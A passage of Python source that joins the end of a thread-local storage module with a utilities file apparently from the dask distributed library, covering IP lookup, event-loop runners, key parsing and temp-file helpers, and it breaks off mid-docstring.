... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
    """A class managing thread-local dicts"""
    __slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'

    def __init__(self):
        # The key used in the Thread objects' attribute dicts.
        # We keep it a string for speed but make it unlikely to clash with
        # a "real" attribute.
        self.key = '_threading_local._localimpl.' + str(id(self))
        # { id(Thread) -> (ref(Thread), thread-local dict) }
        self.dicts = {}

    def get_dict(self):
        """Return the dict for the current thread. Raises KeyError if none
        defined."""
        thread = current_thread()
        return self.dicts[id(thread)][1]

    def create_dict(self):
        """Create a new dict for the current thread, and return it."""
        localdict = {}
        key = self.key
        thread = current_thread()
        idt = id(thread)
        def local_deleted(_, key=key):
            # When the localimpl is deleted, remove the thread attribute.
            thread = wrthread()
            if thread is not None:
                del thread.__dict__[key]
        def thread_deleted(_, idt=idt):
            # When the thread is deleted, remove the local dict.
            # Note that this is suboptimal if the thread object gets
            # caught in a reference loop. We would like to be called
            # as soon as the OS-level thread ends instead.
            local = wrlocal()
            if local is not None:
                dct = local.dicts.pop(idt)
        # Weak references are used here to avoid reference cycles:
        # each thread is recorded in `dicts` so that, when the thread-local
        # is destroyed, the reference held by the thread can be removed;
        # and the thread-local is recorded on the thread so that, when the
        # thread is destroyed, the thread-local's entry for it can be
        # removed. Both cleanups happen via the weakref callbacks above —
        # an implementation approach well worth studying.
        wrlocal = ref(self, local_deleted)
        wrthread = ref(thread, thread_deleted)
        thread.__dict__[key] = wrlocal
        self.dicts[idt] = wrthread, localdict
        return localdict
@contextmanager
def _patch(self):
    """Context manager that swaps in the current thread's dict as
    `self.__dict__` for the duration of an attribute access on a `local`.

    If this thread has no dict yet, one is created and `__init__` is
    re-run with the originally supplied arguments (this is why subclass
    `__init__` runs once per thread).
    """
    impl = object.__getattribute__(self, '_local__impl')
    try:
        dct = impl.get_dict()
    except KeyError:
        dct = impl.create_dict()
        args, kw = impl.localargs
        self.__init__(*args, **kw)
    # The lock serializes the __dict__ swap across threads sharing this
    # local object.
    with impl.locallock:
        object.__setattr__(self, '__dict__', dct)
        yield
class local:
    # __dict__ must be listed so it can be re-pointed per thread by _patch;
    # _local__impl holds the shared _localimpl bookkeeping object.
    __slots__ = '_local__impl', '__dict__'

    def __new__(cls, /, *args, **kw):
        # Extra constructor args are only meaningful if a subclass defines
        # __init__ (it is re-invoked with them in each new thread).
        if (args or kw) and (cls.__init__ is object.__init__):
            raise TypeError("Initialization arguments are not supported")
        self = object.__new__(cls)
        impl = _localimpl()
        impl.localargs = (args, kw)
        impl.locallock = RLock()
        object.__setattr__(self, '_local__impl', impl)
        # We need to create the thread dict in anticipation of
        # __init__ being called, to make sure we don't call it
        # again ourselves.
        impl.create_dict()
        return self

    def __getattribute__(self, name):
        # Every attribute access goes through _patch so the per-thread
        # __dict__ is in place first.
        with _patch(self):
            return object.__getattribute__(self, name)

    def __setattr__(self, name, value):
        if name == '__dict__':
            raise AttributeError(
                "%r object attribute '__dict__' is read-only"
                % self.__class__.__name__)
        with _patch(self):
            return object.__setattr__(self, name, value)

    def __delattr__(self, name):
        if name == '__dict__':
            raise AttributeError(
                "%r object attribute '__dict__' is read-only"
                % self.__class__.__name__)
        with _patch(self):
            return object.__delattr__(self, name)
from threading import current_thread, RLock
|
utils.py | from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# Module logger; the _logger alias survives even if `logger` is rebound.
logger = _logger = logging.getLogger(__name__)
# Sentinel for "no default supplied" in keyword arguments.
no_default = '__no_default__'
def _initialize_mp_context():
    """Choose the multiprocessing context used for worker processes.

    On POSIX CPython 3 this honours the
    ``distributed.worker.multiprocessing-method`` dask config value and
    preloads heavy modules into forkserver children; on Windows/PyPy/PY2
    the plain ``multiprocessing`` module is returned.
    """
    if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
        method = dask.config.get('distributed.worker.multiprocessing-method')
        ctx = multiprocessing.get_context(method)
        # Makes the test suite much faster
        preload = ['distributed']
        if 'pkg_resources' in sys.modules:
            preload.append('pkg_resources')
        ctx.set_forkserver_preload(preload)
    else:
        ctx = multiprocessing
    return ctx

# Module-wide multiprocessing context, computed once at import time.
mp_context = _initialize_mp_context()
def funcname(func):
    """Return a human-readable name for *func*.

    Unwraps ``functools.partial``-style wrappers (anything exposing a
    ``func`` attribute) and falls back to ``str(func)`` for objects
    without a ``__name__``.
    """
    target = func
    while hasattr(target, 'func'):
        target = target.func
    _missing = object()
    name = getattr(target, '__name__', _missing)
    return str(target) if name is _missing else name
def has_arg(func, argname):
    """
    Whether the function takes an argument with the given name.
    """
    current = func
    while True:
        try:
            if argname in getargspec(current).args:
                return True
        except TypeError:
            # Not introspectable (builtins etc.) -- give up.
            return False
        # For Tornado coroutines and other decorated functions
        wrapped = getattr(current, '__wrapped__', None)
        if wrapped is None:
            return False
        current = wrapped
def get_fileno_limit():
    """
    Get the maximum number of open files per process.
    """
    if resource is None:
        # Default ceiling for Windows when using the CRT, though it
        # is settable using _setmaxstdio().
        return 512
    return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
@toolz.memoize
def _get_ip(host, port, family, default):
    """Return the local address used to reach (*host*, *port*) for the
    given socket *family*, or *default* (with a warning) on failure."""
    # By using a UDP socket, we don't actually try to connect but
    # simply select the local address through which *host* is reachable.
    sock = socket.socket(family, socket.SOCK_DGRAM)
    try:
        sock.connect((host, port))
        ip = sock.getsockname()[0]
        return ip
    except EnvironmentError as e:
        # XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
        warnings.warn("Couldn't detect a suitable IP address for "
                      "reaching %r, defaulting to %r: %s"
                      % (host, default, e), RuntimeWarning)
        return default
    finally:
        sock.close()
def get_ip(host='8.8.8.8', port=80):
    """
    Get the local IP address through which the *host* is reachable.
    *host* defaults to a well-known Internet host (one of Google's public
    DNS servers).
    """
    fallback = '127.0.0.1'
    return _get_ip(host, port, family=socket.AF_INET, default=fallback)
def get_ipv6(host='2001:4860:4860::8888', port=80):
    """
    The same as get_ip(), but for IPv6.
    """
    fallback = '::1'
    return _get_ip(host, port, family=socket.AF_INET6, default=fallback)
def get_ip_interface(ifname):
    """
    Get the local IPv4 address of a network interface.

    KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
    associated with it.
    """
    import psutil
    addresses = psutil.net_if_addrs()[ifname]
    ipv4 = [info.address for info in addresses
            if info.family == socket.AF_INET]
    if ipv4:
        return ipv4[0]
    raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
    """Context manager that silently swallows exceptions of the given types.

    >>> with ignoring(KeyError):
    ...     {}['missing']
    """
    try:
        yield
    except exceptions:
        # Fix: the exception was previously bound to an unused local `e`.
        pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
    """ Process list of coroutines, ignoring certain exceptions
    >>> coroutines = [cor(...) for ...] # doctest: +SKIP
    >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
    """
    wait_iterator = gen.WaitIterator(*coroutines)
    results = []
    while not wait_iterator.done():
        # Results are collected in completion order; a listed exception
        # type drops that single result and continues with the rest.
        with ignoring(*exceptions):
            result = yield wait_iterator.next()
            results.append(result)
    raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
    """ Wait on many tasks at the same time
    Err once any of the tasks err.
    See https://github.com/tornadoweb/tornado/issues/1546
    Parameters
    ----------
    args: futures to wait for
    quiet_exceptions: tuple, Exception
        Exception types to avoid logging if they fail
    """
    tasks = gen.WaitIterator(*args)
    # Results are stored at each task's original position, not arrival order.
    results = [None for _ in args]
    while not tasks.done():
        try:
            result = yield tasks.next()
        except Exception:

            @gen.coroutine
            def quiet():
                """ Watch unfinished tasks
                Otherwise if they err they get logged in a way that is hard to
                control. They need some other task to watch them so that they
                are not orphaned
                """
                for task in list(tasks._unfinished):
                    try:
                        yield task
                    except quiet_exceptions:
                        pass

            # Fire-and-forget watcher for the still-running tasks, then
            # propagate the first failure to the caller.
            quiet()
            raise
        results[tasks.current_index] = result
    raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
    """
    Run coroutine in loop running in separate thread.

    Blocks the calling thread until the coroutine finishes (or
    ``callback_timeout`` seconds elapse) and returns its result,
    re-raising any exception with its original traceback.
    """
    # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
    if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
                       (hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
        raise RuntimeError("IOLoop is closed")
    timeout = kwargs.pop('callback_timeout', None)

    e = threading.Event()
    main_tid = get_thread_identity()
    # Single-element lists let the inner coroutine communicate back.
    result = [None]
    error = [False]

    @gen.coroutine
    def f():
        try:
            # Deadlock guard: calling sync() from the loop's own thread
            # would block forever waiting on the event it must set itself.
            if main_tid == get_thread_identity():
                raise RuntimeError("sync() called from thread of running loop")
            yield gen.moment
            thread_state.asynchronous = True
            future = func(*args, **kwargs)
            if timeout is not None:
                future = gen.with_timeout(timedelta(seconds=timeout), future)
            result[0] = yield future
        except Exception as exc:
            error[0] = sys.exc_info()
        finally:
            thread_state.asynchronous = False
            e.set()

    loop.add_callback(f)
    if timeout is not None:
        if not e.wait(timeout):
            raise gen.TimeoutError("timed out after %s s." % (timeout,))
    else:
        # Wait in bounded slices rather than a single unbounded wait --
        # presumably so the wait stays interruptible; TODO confirm.
        while not e.is_set():
            e.wait(10)
    if error[0]:
        # Re-raise with the original traceback preserved.
        six.reraise(*error[0])
    else:
        return result[0]
class LoopRunner(object):
    """
    A helper to start and stop an IO loop in a controlled way.
    Several loop runners can associate safely to the same IO loop.
    Parameters
    ----------
    loop: IOLoop (optional)
        If given, this loop will be re-used, otherwise an appropriate one
        will be looked up or created.
    asynchronous: boolean (optional, default False)
        If false (the default), the loop is meant to run in a separate
        thread and will be started if necessary.
        If true, the loop is meant to run in the thread this
        object is instantiated from, and will not be started automatically.
    """
    # All loops currently associated to loop runners.
    # Maps loop -> (reference count, the LoopRunner that actually started it).
    _all_loops = weakref.WeakKeyDictionary()
    _lock = threading.Lock()

    def __init__(self, loop=None, asynchronous=False):
        current = IOLoop.current()
        if loop is None:
            if asynchronous:
                self._loop = current
            else:
                # We're expecting the loop to run in another thread,
                # avoid re-using this thread's assigned loop
                self._loop = IOLoop()
            self._should_close_loop = True
        else:
            self._loop = loop
            self._should_close_loop = False
        self._asynchronous = asynchronous
        self._loop_thread = None
        self._started = False
        with self._lock:
            # Register the loop with a zero refcount if not yet known.
            self._all_loops.setdefault(self._loop, (0, None))

    def start(self):
        """
        Start the IO loop if required.  The loop is run in a dedicated
        thread.
        If the loop is already running, this method does nothing.
        """
        with self._lock:
            self._start_unlocked()

    def _start_unlocked(self):
        assert not self._started
        count, real_runner = self._all_loops[self._loop]
        # If the loop is asynchronous or already started by someone else,
        # just bump the reference count.
        if (self._asynchronous or real_runner is not None or count > 0):
            self._all_loops[self._loop] = count + 1, real_runner
            self._started = True
            return
        assert self._loop_thread is None
        assert count == 0
        loop_evt = threading.Event()
        done_evt = threading.Event()
        in_thread = [None]
        start_exc = [None]

        def loop_cb():
            # Records which thread the loop actually runs in.
            in_thread[0] = threading.current_thread()
            loop_evt.set()

        def run_loop(loop=self._loop):
            loop.add_callback(loop_cb)
            try:
                loop.start()
            except Exception as e:
                start_exc[0] = e
            finally:
                done_evt.set()

        thread = threading.Thread(target=run_loop, name="IO loop")
        thread.daemon = True
        thread.start()
        loop_evt.wait(timeout=10)
        self._started = True
        actual_thread = in_thread[0]
        if actual_thread is not thread:
            # Loop already running in other thread (user-launched)
            done_evt.wait(5)
            if not isinstance(start_exc[0], RuntimeError):
                if not isinstance(start_exc[0], Exception):  # track down infrequent error
                    raise TypeError("not an exception", start_exc[0])
                raise start_exc[0]
            self._all_loops[self._loop] = count + 1, None
        else:
            assert start_exc[0] is None, start_exc
            self._loop_thread = thread
            # This runner owns the loop and is responsible for stopping it.
            self._all_loops[self._loop] = count + 1, self

    def stop(self, timeout=10):
        """
        Stop and close the loop if it was created by us.
        Otherwise, just mark this object "stopped".
        """
        with self._lock:
            self._stop_unlocked(timeout)

    def _stop_unlocked(self, timeout):
        if not self._started:
            return
        self._started = False
        count, real_runner = self._all_loops[self._loop]
        if count > 1:
            # Other runners still reference the loop: only decrement.
            self._all_loops[self._loop] = count - 1, real_runner
        else:
            assert count == 1
            del self._all_loops[self._loop]
            if real_runner is not None:
                real_runner._real_stop(timeout)

    def _real_stop(self, timeout):
        assert self._loop_thread is not None
        if self._loop_thread is not None:
            try:
                self._loop.add_callback(self._loop.stop)
                self._loop_thread.join(timeout=timeout)
                self._loop.close()
            finally:
                self._loop_thread = None

    def is_started(self):
        """
        Return True between start() and stop() calls, False otherwise.
        """
        return self._started

    def run_sync(self, func, *args, **kwargs):
        """
        Convenience helper: start the loop if needed,
        run sync(func, *args, **kwargs), then stop the loop again.
        """
        if self._started:
            return sync(self.loop, func, *args, **kwargs)
        else:
            self.start()
            try:
                return sync(self.loop, func, *args, **kwargs)
            finally:
                self.stop()

    @property
    def loop(self):
        return self._loop
@contextmanager
def set_thread_state(**kwargs):
    """Temporarily set attributes on the module-level ``thread_state``.

    On exit previous values are restored; attributes that did not exist
    beforehand are deleted again.
    """
    sentinel = object()
    saved = {k: getattr(thread_state, k, sentinel) for k in kwargs}
    for k, v in kwargs.items():
        setattr(thread_state, k, v)
    try:
        yield
    finally:
        for k, previous in saved.items():
            if previous is sentinel:
                delattr(thread_state, k)
            else:
                setattr(thread_state, k, previous)
@contextmanager
def tmp_text(filename, text):
    """Write *text* to *filename* in the system temp directory, yield the
    full path, and remove the file on exit."""
    path = os.path.join(tempfile.gettempdir(), filename)
    with open(path, 'w') as fh:
        fh.write(text)
    try:
        yield path
    finally:
        if os.path.exists(path):
            os.remove(path)
def clear_queue(q):
    """Discard every item currently sitting in queue *q* (non-blocking)."""
    while not q.empty():
        q.get_nowait()
def is_kernel():
    """ Determine if we're running within an IPython kernel
    >>> is_kernel()
    False
    """
    # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
    if 'IPython' not in sys.modules:  # IPython hasn't been imported
        return False
    from IPython import get_ipython
    shell = get_ipython()
    # check for `kernel` attribute on the IPython instance
    return getattr(shell, 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')

def key_split(s):
    """
    >>> key_split('x')
    'x'
    >>> key_split('x-1')
    'x'
    >>> key_split('x-1-2-3')
    'x'
    >>> key_split(('x-2', 1))
    'x'
    >>> key_split("('x-2', 1)")
    'x'
    >>> key_split("('x', 1)")
    'x'
    >>> key_split('hello-world-1')
    'hello-world'
    >>> key_split(b'hello-world-1')
    'hello-world'
    >>> key_split('ae05086432ca935f6eba409a8ecd4896')
    'data'
    >>> key_split('<module.submodule.myclass object at 0xdaf372')
    'myclass'
    >>> key_split(None)
    'Other'
    >>> key_split('x-abcdefab')  # ignores hex
    'x'
    """
    # Normalise bytes and task-key tuples down to a plain string first.
    if type(s) is bytes:
        s = s.decode()
    if type(s) is tuple:
        s = s[0]
    try:
        words = s.split('-')
        first = words[0]
        if first[0].isalpha():
            result = first
        else:
            # Stringified tuple such as "('x-2', 1)" -- peel the wrapping.
            result = first.split(",")[0].strip("'(\"")
        for word in words[1:]:
            looks_hex = len(word) == 8 and hex_pattern.match(word) is not None
            if not word.isalpha() or looks_hex:
                break
            result += '-' + word
        if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
            return 'data'
        if result[0] == '<':
            result = result.strip('<>').split()[0].split('.')[-1]
        return result
    except Exception:
        return 'Other'

try:
    from functools import lru_cache
except ImportError:
    lru_cache = False
else:
    key_split = lru_cache(100000)(key_split)
# Two variants of key_split_group: the Python-2 branch must additionally
# accept `unicode` strings, otherwise the logic is identical.
if PY3:
    def key_split_group(x):
        """A more fine-grained version of key_split
        >>> key_split_group('x')
        'x'
        >>> key_split_group('x-1')
        'x-1'
        >>> key_split_group('x-1-2-3')
        'x-1-2-3'
        >>> key_split_group(('x-2', 1))
        'x-2'
        >>> key_split_group("('x-2', 1)")
        'x-2'
        >>> key_split_group('hello-world-1')
        'hello-world-1'
        >>> key_split_group(b'hello-world-1')
        'hello-world-1'
        >>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
        'data'
        >>> key_split_group('<module.submodule.myclass object at 0xdaf372')
        'myclass'
        >>> key_split_group(None)
        'Other'
        >>> key_split_group('x-abcdefab')  # ignores hex
        'x-abcdefab'
        """
        typ = type(x)
        if typ is tuple:
            return x[0]
        elif typ is str:
            if x[0] == '(':
                # Stringified tuple: take the first element.
                return x.split(',', 1)[0].strip('()"\'')
            elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
                # 32-char hex digest: treat as raw data key.
                return 'data'
            elif x[0] == '<':
                # repr() of an object: use the class name.
                return x.strip('<>').split()[0].split('.')[-1]
            else:
                return x
        elif typ is bytes:
            return key_split_group(x.decode())
        else:
            return 'Other'
else:
    def key_split_group(x):
        """A more fine-grained version of key_split
        >>> key_split_group('x')
        'x'
        >>> key_split_group('x-1')
        'x-1'
        >>> key_split_group('x-1-2-3')
        'x-1-2-3'
        >>> key_split_group(('x-2', 1))
        'x-2'
        >>> key_split_group("('x-2', 1)")
        'x-2'
        >>> key_split_group('hello-world-1')
        'hello-world-1'
        >>> key_split_group(b'hello-world-1')
        'hello-world-1'
        >>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
        'data'
        >>> key_split_group('<module.submodule.myclass object at 0xdaf372')
        'myclass'
        >>> key_split_group(None)
        'Other'
        >>> key_split_group('x-abcdefab')  # ignores hex
        'x-abcdefab'
        """
        typ = type(x)
        if typ is tuple:
            return x[0]
        elif typ is str or typ is unicode:
            if x[0] == '(':
                return x.split(',', 1)[0].strip('()"\'')
            elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
                return 'data'
            elif x[0] == '<':
                return x.strip('<>').split()[0].split('.')[-1]
            else:
                return x
        else:
            return 'Other'
@contextmanager
def log_errors(pdb=False):
    """Log (and re-raise) any exception escaping the wrapped block.

    CommClosedError and gen.Return propagate untouched.  With
    ``pdb=True`` a debugger is started at the failure point.
    """
    from .comm import CommClosedError
    try:
        yield
    except (CommClosedError, gen.Return):
        raise
    except Exception as e:
        try:
            logger.exception(e)
        except TypeError:  # logger becomes None during process cleanup
            pass
        if pdb:
            # Note: the import deliberately rebinds the local name `pdb`
            # (the boolean flag) to the debugger module.
            import pdb
            pdb.set_trace()
        raise
def silence_logging(level, root='distributed'):
    """
    Set every StreamHandler attached to logger *root* to *level*.

    *level* may be numeric or a level name such as ``"warning"``.
    Returns the previous level of the last StreamHandler seen
    (None when there were none).
    """
    if isinstance(level, str):
        level = getattr(logging, level.upper())
    previous = None
    for handler in logging.getLogger(root).handlers:
        if isinstance(handler, logging.StreamHandler):
            previous = handler.level
            handler.setLevel(level)
    return previous
@toolz.memoize
def ensure_ip(hostname):
    """ Ensure that address is an IP address
    Examples
    --------
    >>> ensure_ip('localhost')
    '127.0.0.1'
    >>> ensure_ip('123.123.123.123') # pass through IP addresses
    '123.123.123.123'
    """
    # Prefer IPv4 over IPv6, for compatibility
    families = [socket.AF_INET, socket.AF_INET6]
    for fam in families:
        try:
            results = socket.getaddrinfo(hostname,
                                         1234,  # dummy port number
                                         fam, socket.SOCK_STREAM)
        except socket.gaierror as e:
            exc = e
        else:
            # getaddrinfo result tuple: (family, type, proto, canonname,
            # sockaddr) -- sockaddr[0] is the IP address.
            return results[0][4][0]
    # Neither family resolved: re-raise the last resolution error.
    raise exc
# Make traceback objects picklable so remote exceptions can carry them.
tblib.pickling_support.install()
def get_traceback():
    """Return the active exception's traceback with leading frames from
    distributed/tornado/concurrent.futures internals stripped off."""
    exc_type, exc_value, tb = sys.exc_info()
    noisy = (os.path.join('distributed', 'worker'),
             os.path.join('distributed', 'scheduler'),
             os.path.join('tornado', 'gen.py'),
             os.path.join('concurrent', 'futures'))
    while tb is not None and any(fragment in tb.tb_frame.f_code.co_filename
                                 for fragment in noisy):
        tb = tb.tb_next
    return tb
def truncate_exception(e, n=10000):
    """ Truncate exception to be about a certain length

    Exceptions whose string form fits in *n* characters are returned
    unchanged; longer ones are replaced by a shortened stand-in of the
    same type (or a plain Exception when that type can't be built).
    """
    if len(str(e)) <= n:
        return e
    try:
        return type(e)("Long error message",
                       str(e)[:n])
    except Exception:
        return Exception("Long error message",
                         type(e),
                         str(e)[:n])
# queue_to_iterator(q) yields items pulled from a queue until it sees a
# StopIteration instance, which acts as the end-of-stream sentinel.  The
# Python-3 variant is built with exec() because `return value` inside a
# generator is a syntax error on Python 2.
if sys.version_info >= (3,):
    # (re-)raising StopIteration is deprecated in 3.6+
    exec("""def queue_to_iterator(q):
    while True:
        result = q.get()
        if isinstance(result, StopIteration):
            return result.value
        yield result
""")
else:
    # Returning non-None from generator is a syntax error in 2.x
    def queue_to_iterator(q):
        while True:
            result = q.get()
            if isinstance(result, StopIteration):
                raise result
            yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
    """Consume *seq* on a daemon thread and expose its items via a Queue."""
    q = Queue(maxsize=maxsize)
    worker = threading.Thread(target=_dump_to_queue, args=(seq, q))
    worker.daemon = True
    worker.start()
    return q
def tokey(o):
    """Convert an object to a string key.

    Text and bytes objects pass through unchanged; anything else is
    converted with ``str()``.

    >>> tokey('x')
    'x'
    >>> tokey(1)
    '1'
    """
    if type(o) in (unicode, bytes):
        return o
    return str(o)
def validate_key(k):
    """Validate a key as received on a stream.

    Raises TypeError unless *k* is text or bytes.
    """
    kind = type(k)
    if kind is not unicode and kind is not bytes:
        raise TypeError("Unexpected key type %s (value: %r)"
                        % (kind, k))
def _maybe_complex(task):
    """ Possibly contains a nested task """
    if istask(task):
        return True
    if type(task) is list:
        return any(map(_maybe_complex, task))
    if type(task) is dict:
        return any(map(_maybe_complex, task.values()))
    return False
def convert(task, dsk, extra_values):
    """Recursively rewrite a task spec, replacing any key found in *dsk*
    or *extra_values* with its string form (via ``tokey``)."""
    kind = type(task)
    if kind is list:
        return [convert(item, dsk, extra_values) for item in task]
    if kind is dict:
        return {key: convert(value, dsk, extra_values)
                for key, value in task.items()}
    if istask(task):
        return (task[0],) + tuple(convert(arg, dsk, extra_values)
                                  for arg in task[1:])
    try:
        if task in dsk or task in extra_values:
            return tokey(task)
    except TypeError:
        # Unhashable leaf value -- leave it alone.
        pass
    return task
def str_graph(dsk, extra_values=()):
    """Return a copy of graph *dsk* with all keys and key references
    converted to strings."""
    return dict((tokey(k), convert(v, dsk, extra_values))
                for k, v in dsk.items())
def seek_delimiter(file, delimiter, blocksize):
    """ Seek current file to next byte after a delimiter bytestring

    Leaves the file positioned just past the next occurrence of
    *delimiter* (or at EOF if none is found); returns nothing -- use
    ``file.tell()`` to see the location afterwards.  A file at offset 0
    is left untouched.

    Parameters
    ----------
    file: a file
    delimiter: bytes
        a delimiter like ``b'\\n'`` or message sentinel
    blocksize: int
        Number of bytes to read from the file at once.
    """
    if file.tell() == 0:
        return
    tail = b''
    while True:
        chunk = file.read(blocksize)
        if not chunk:
            return
        # Prepend the previous tail so delimiters spanning two reads match.
        window = tail + chunk
        position = window.find(delimiter)
        if position != -1:
            file.seek(file.tell() - (len(window) - position) + len(delimiter))
            return
        tail = window[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
    """ Read a block of bytes from a file

    Parameters
    ----------
    f: file
        File-like object supporting seek, read, tell, etc..
    offset: int
        Byte offset to start read
    length: int
        Number of bytes to read
    delimiter: bytes (optional)
        Ensure reading starts and stops at delimiter bytestring

    If using the ``delimiter=`` keyword argument we ensure that the read
    starts and stops at delimiter boundaries that follow the locations
    ``offset`` and ``offset + length``.  If ``offset`` is zero then we
    start at zero.  The bytestring returned WILL include the
    terminating delimiter string.

    Examples
    --------
    >>> from io import BytesIO  # doctest: +SKIP
    >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300')  # doctest: +SKIP
    >>> read_block(f, 0, 13)  # doctest: +SKIP
    b'Alice, 100\\nBo'
    >>> read_block(f, 0, 13, delimiter=b'\\n')  # doctest: +SKIP
    b'Alice, 100\\nBob, 200\\n'
    >>> read_block(f, 10, 10, delimiter=b'\\n')  # doctest: +SKIP
    b'Bob, 200\\nCharlie, 300'
    """
    if delimiter:
        # Snap the start and end of the read onto delimiter boundaries.
        f.seek(offset)
        seek_delimiter(f, delimiter, 2**16)
        start = f.tell()
        length -= start - offset
        f.seek(start + length)
        seek_delimiter(f, delimiter, 2**16)
        offset = start
        length = f.tell() - start
    f.seek(offset)
    return f.read(length)
@contextmanager
def tmpfile(extension=''):
    """Yield the path of a non-existent temporary file with *extension*.

    The file itself is not created; the caller may create a file or a
    directory at the path.  Whatever ends up there is removed on exit --
    including when the with-block raises (the previous version skipped
    cleanup on exceptions because the removal code was not in a
    ``finally`` clause).
    """
    extension = '.' + extension.lstrip('.')
    handle, filename = tempfile.mkstemp(extension)
    os.close(handle)
    os.remove(filename)
    try:
        yield filename
    finally:
        if os.path.exists(filename):
            if os.path.isdir(filename):
                shutil.rmtree(filename)
            else:
                try:
                    os.remove(filename)
                except OSError:  # sometimes we can't remove a generated temp file
                    pass
def ensure_bytes(s):
    """Coerce text, bytes, bytearray, memoryview (or a PY2 buffer) to bytes.

    >>> ensure_bytes('123')
    b'123'
    >>> ensure_bytes(b'123')
    b'123'
    """
    if isinstance(s, bytes):
        return s
    if isinstance(s, memoryview):
        return s.tobytes()
    if isinstance(s, bytearray) or (PY2 and isinstance(s, buffer)):  # noqa: F821
        return bytes(s)
    encode = getattr(s, 'encode', None)
    if encode is not None:
        return encode()
    raise TypeError(
        "Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
    """
    >>> divide_n_among_bins(12, [1, 1])
    [6, 6]
    >>> divide_n_among_bins(12, [1, 2])
    [4, 8]
    >>> divide_n_among_bins(12, [1, 2, 1])
    [3, 6, 3]
    >>> divide_n_among_bins(11, [1, 2, 1])
    [2, 6, 3]
    >>> divide_n_among_bins(11, [.1, .2, .1])
    [2, 6, 3]
    """
    total = sum(bins)
    out = []
    carry = 0.0
    for weight in bins:
        # Carry the fractional remainder forward so the shares sum to ~n.
        share, carry = divmod(n / total * weight + carry, 1)
        out.append(int(share))
    return out
def mean(seq):
    """Arithmetic mean of *seq* (materialised once, so iterators work)."""
    items = list(seq)
    return sum(items) / len(items)
# shutting_down() reports whether the interpreter is exiting.  Use the
# native sys.is_finalizing when available; otherwise flip a flag from an
# atexit hook.  Defaults are early-bound so the functions keep working
# during interpreter shutdown, when module globals may be cleared.
if hasattr(sys, "is_finalizing"):
    def shutting_down(is_finalizing=sys.is_finalizing):
        return is_finalizing()
else:
    _shutting_down = [False]

    def _at_shutdown(l=_shutting_down):
        l[0] = True

    def shutting_down(l=_shutting_down):
        return l[0]

    atexit.register(_at_shutdown)

shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
    """ Return a probably-open port

    There is a chance that this port will be taken by the operating system soon
    after returning from this function.
    """
    # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((host, 0))
        s.listen(1)
        return s.getsockname()[1]
    finally:
        # Always release the probe socket, even when bind()/listen() fail
        # (previously an exception here leaked the socket).
        s.close()
def import_file(path):
    """ Loads modules for a file (.py, .zip, .egg)

    Returns the list of (re)loaded module objects; logs a warning and
